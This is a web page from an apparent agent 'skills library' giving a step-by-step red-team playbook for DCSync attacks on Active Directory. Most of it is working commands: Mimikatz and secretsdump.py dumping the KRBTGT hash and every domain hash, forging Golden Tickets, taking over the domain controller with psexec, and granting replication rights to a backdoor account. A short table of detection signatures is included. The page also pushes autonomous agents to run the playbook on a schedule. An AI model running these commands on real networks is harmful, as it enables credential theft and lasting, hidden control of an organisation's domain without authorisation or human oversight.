CG
SkillsConducting Domain Persistence with Dcsync
Start Free
Back to Skills Library
Red Team & Offensive Security🟡 Intermediate

Conducting Domain Persistence with Dcsync

Perform DCSync attacks to replicate Active Directory credentials and establish domain persistence by extracting KRBTGT, Domain Admin, and service account hashes for Golden Ticket creation.

4 min read8 code examples5 MITRE techniques

MITRE ATT&CK Coverage

T1003.006T1558.001T1222.001T1098T1078.002

Conducting Domain Persistence with DCSync

Overview

DCSync is an attack technique that abuses the Microsoft Directory Replication Service Remote Protocol (MS-DRSR) to impersonate a Domain Controller and request password data from the target DC. The attack was introduced by Benjamin Delpy (Mimikatz author) and Vincent Le Toux, leveraging the DS-Replication-Get-Changes and DS-Replication-Get-Changes-All extended rights. Any principal (user or computer) with these rights can replicate password hashes for any account in the domain, including the KRBTGT account. With the KRBTGT hash, attackers can forge Golden Tickets for indefinite domain persistence. DCSync is categorized as MITRE ATT&CK T1003.006 and is a critical post-exploitation technique used by APT groups including APT28 (Fancy Bear), APT29 (Cozy Bear), and FIN6.

Objectives

  • Identify accounts with DCSync (replication) rights in Active Directory
  • Perform DCSync using Mimikatz or Impacket's secretsdump.py
  • Extract the KRBTGT account hash for Golden Ticket creation
  • Dump all domain user password hashes for credential analysis
  • Forge Golden Tickets for persistent domain access
  • Grant DCSync rights to a controlled account for alternative persistence
  • Document the attack chain and persistence mechanisms

MITRE ATT&CK Mapping

  • T1003.006 - OS Credential Dumping: DCSync
  • T1558.001 - Steal or Forge Kerberos Tickets: Golden Ticket
  • T1222.001 - File and Directory Permissions Modification: Windows
  • T1098 - Account Manipulation
  • T1078.002 - Valid Accounts: Domain Accounts

Implementation Steps

Phase 1: Identify Accounts with DCSync Rights

  1. Enumerate principals with replication rights:

```powershell

# Using PowerView

Get-DomainObjectAcl -SearchBase "DC=domain,DC=local" -ResolveGUIDs |

Where-Object { ($_.ObjectAceType -match 'Replicating') -and

($_.ActiveDirectoryRights -match 'ExtendedRight') } |

Select-Object SecurityIdentifier, ObjectAceType

# Using BloodHound Cypher query

MATCH (u)-[:DCSync|GetChanges|GetChangesAll*1..]->(d:Domain)

RETURN u.name, d.name

```

  1. Using Impacket's FindDelegation or custom LDAP query:

```bash

# Check with Impacket

findDelegation.py domain.local/user:'Password123' -dc-ip 10.10.10.1

```

  1. Default accounts with DCSync rights:
  • Domain Admins
  • Enterprise Admins
  • Domain Controllers group
  • SYSTEM on Domain Controllers

Phase 2: DCSync Credential Extraction

  1. Using Mimikatz (Windows):

```powershell

# Dump specific account (KRBTGT for Golden Ticket)

mimikatz.exe "lsadump::dcsync /domain:domain.local /user:krbtgt"

# Dump Domain Admin

mimikatz.exe "lsadump::dcsync /domain:domain.local /user:administrator"

# Dump all domain accounts

mimikatz.exe "lsadump::dcsync /domain:domain.local /all /csv"

```

  1. Using Impacket secretsdump.py (Linux):

```bash

# Dump all credentials

secretsdump.py domain.local/admin:'Password123'@10.10.10.1

# Dump specific user

secretsdump.py -just-dc-user krbtgt domain.local/admin:'Password123'@10.10.10.1

# Dump only NTLM hashes (no Kerberos keys)

secretsdump.py -just-dc-ntlm domain.local/admin:'Password123'@10.10.10.1

# Using Kerberos authentication

export KRB5CCNAME=admin.ccache

secretsdump.py -k -no-pass domain.local/admin@DC01.domain.local

```

Phase 3: Golden Ticket Creation

  1. Using Mimikatz with extracted KRBTGT hash:

```powershell

# Create Golden Ticket

mimikatz.exe "kerberos::golden /user:administrator /domain:domain.local \

/sid:S-1-5-21-XXXXXXXXXX-XXXXXXXXXX-XXXXXXXXXX \

/krbtgt:<krbtgt_ntlm_hash> /ptt"

# Create with specific group memberships

mimikatz.exe "kerberos::golden /user:fakeadmin /domain:domain.local \

/sid:S-1-5-21-XXXXXXXXXX \

/krbtgt:<krbtgt_ntlm_hash> \

/groups:512,513,518,519,520 /ptt"

```

  1. Using Impacket ticketer.py (Linux):

```bash

# Create Golden Ticket

ticketer.py -nthash <krbtgt_ntlm_hash> -domain-sid S-1-5-21-XXXXXXXXXX \

-domain domain.local administrator

# Use the ticket

export KRB5CCNAME=administrator.ccache

psexec.py -k -no-pass domain.local/administrator@DC01.domain.local

```

Phase 4: Persistence via DCSync Rights

  1. Grant DCSync rights to a controlled account for persistence:

```powershell

# Using PowerView - Add DS-Replication-Get-Changes-All rights

Add-DomainObjectAcl -TargetIdentity "DC=domain,DC=local" \

-PrincipalIdentity backdoor_user -Rights DCSync

# Verify rights were added

Get-DomainObjectAcl -SearchBase "DC=domain,DC=local" -ResolveGUIDs |

Where-Object { $_.SecurityIdentifier -match "backdoor_user_SID" }

```

  1. Using ntlmrelayx.py for automated DCSync rights escalation:

```bash

# Relay authentication to add DCSync rights

ntlmrelayx.py -t ldap://DC01.domain.local --escalate-user backdoor_user

```

Tools and Resources

ToolPurposePlatform
MimikatzDCSync extraction, Golden Ticket creationWindows
secretsdump.pyRemote DCSync (Impacket)Linux (Python)
ticketer.pyGolden Ticket creation (Impacket)Linux (Python)
PowerViewACL enumeration and modificationWindows (PowerShell)
RubeusKerberos ticket manipulationWindows (.NET)
ntlmrelayx.pyDCSync rights escalation via relayLinux (Python)

Critical Hashes to Extract

AccountPurposePersistence Value
krbtgtGolden Ticket creationIndefinite domain access
AdministratorDirect DA accessImmediate privileged access
Service accountsLateral movementService access across domain
Computer accountsSilver Ticket creationService-level impersonation

Detection Signatures

IndicatorDetection Method
DrsGetNCChanges RPC calls from non-DC sourcesNetwork monitoring for DRSUAPI traffic from unusual IPs
Event 4662 with Replicating Directory Changes GUIDsWindows Security Log on DC (1131f6aa-/1131f6ad- GUIDs)
Event 4624 with Golden Ticket anomaliesLogon events with impossible SIDs or non-existent users
ACL modifications on domain root objectEvent 5136 (directory service changes)
Replication traffic volume spikeNetwork baseline deviation monitoring

Validation Criteria

  • [ ] Accounts with DCSync rights enumerated
  • [ ] KRBTGT hash extracted via DCSync
  • [ ] All domain credentials dumped successfully
  • [ ] Golden Ticket forged and validated for DA access
  • [ ] DCSync rights persistence mechanism established (if in scope)
  • [ ] Access to Domain Controller validated with Golden Ticket
  • [ ] Evidence documented with hash values and timestamps
  • [ ] Remediation recommendations provided (double KRBTGT reset, ACL audit)

Compliance Framework Mapping

This skill supports compliance evidence collection across multiple frameworks:

  • SOC 2: CC4.1 (Monitoring & Evaluation), CC7.1 (Monitoring)
  • ISO 27001: A.14.2 (Secure Development), A.18.2 (Information Security Reviews)
  • NIST 800-53: CA-8 (Penetration Testing), RA-5 (Vulnerability Scanning)
  • NIST CSF: ID.RA (Risk Assessment), PR.IP (Information Protection)

Claw GRC Tip: When this skill is executed by a registered agent, compliance evidence is automatically captured and mapped to the relevant controls in your active frameworks.

Deploying This Skill with Claw GRC

Agent Execution

Register this skill with your Claw GRC agent for automated execution:

# Install via CLI
npx claw-grc skills add conducting-domain-persistence-with-dcsync

# Or load dynamically via MCP
grc.load_skill("conducting-domain-persistence-with-dcsync")

Audit Trail Integration

When executed through Claw GRC, every step of this skill generates tamper-evident audit records:

  • SHA-256 chain hashing ensures no step can be modified after execution
  • Evidence artifacts (configs, scan results, logs) are automatically attached to relevant controls
  • Trust score impact — successful execution increases your agent's trust score

Continuous Compliance

Schedule this skill for recurring execution to maintain continuous compliance posture. Claw GRC monitors for drift and alerts when re-execution is needed.

Use with Claw GRC Agents

This skill is fully compatible with Claw GRC's autonomous agent system. Deploy it to any registered agent via MCP, and every execution will be logged in the tamper-evident audit trail.

// Load this skill in your agent
npx claw-grc skills add conducting-domain-persistence-with-dcsync
// Or via MCP
grc.load_skill("conducting-domain-persistence-with-dcsync")

Tags

red-teamactive-directorydcsyncpersistencecredential-dumpinggolden-ticketmimikatz

Related Skills

Red Team & Offensive Security

Conducting Internal Reconnaissance with BloodHound Ce

4m·intermediate
Red Team & Offensive Security

Performing Active Directory Forest Trust Attack

3m·intermediate
Threat Hunting

Detecting Dcsync Attack in Active Directory

3m·intermediate
Threat Detection

Detecting Golden Ticket Forgery

3m·intermediate
Red Team & Offensive Security

Exploiting Active Directory Certificate Services Esc1

4m·advanced
Red Team & Offensive Security

Exploiting Active Directory with BloodHound

3m·advanced

Skill Details

Domain
Red Team & Offensive Security
Difficulty
intermediate
Read Time
4 min
Code Examples
8
MITRE IDs
5

On This Page

OverviewObjectivesMITRE ATT&CK MappingImplementation StepsTools and ResourcesCritical Hashes to ExtractDetection SignaturesValidation CriteriaCompliance Framework MappingDeploying This Skill with Claw GRC

Deploy This Skill

Add this skill to your Claw GRC agent and start automating.

Get Started Free →